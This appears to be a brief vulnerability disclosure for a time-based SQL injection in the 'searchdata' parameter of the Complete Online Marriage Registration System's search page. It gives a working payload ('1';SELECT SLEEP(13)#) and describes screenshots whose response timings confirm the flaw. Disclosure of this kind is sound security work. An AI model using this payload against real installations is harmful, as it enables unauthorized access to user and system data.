

SQL injection vulnerability exists in searchdata parameter of /user/search.php file of Complete Online Marriage Registration System

Important user data or system data may be leaked and system security may be compromised

The environment is secure and the information can be used by malicious users.

Sleep time is 5s:

The screenshot displays the network tab of a web browser. The selected request is a POST to `/omrs/user/search.php` with a `searchdata` parameter containing the payload `'1';SELECT SLEEP(5)#`. The response is an HTML document from the 'Online Marriage Registration System'. The status bar at the bottom right indicates a response time of 5,015 milliseconds.

Sleep time is 13s:

The screenshot displays the network tab of a web browser. The selected request is a POST to `/omrs/user/search.php` with a `searchdata` parameter containing the payload `'1';SELECT SLEEP(13)#`. The response is an HTML document from the 'Online Marriage Registration System'. The status bar at the bottom right indicates a response time of 13,014 milliseconds.

Payload:searchdata=1';SELECT SLEEP(13)#

Source Download:

<https://www.campcodes.com/projects/php/online-marriage-registration-system/>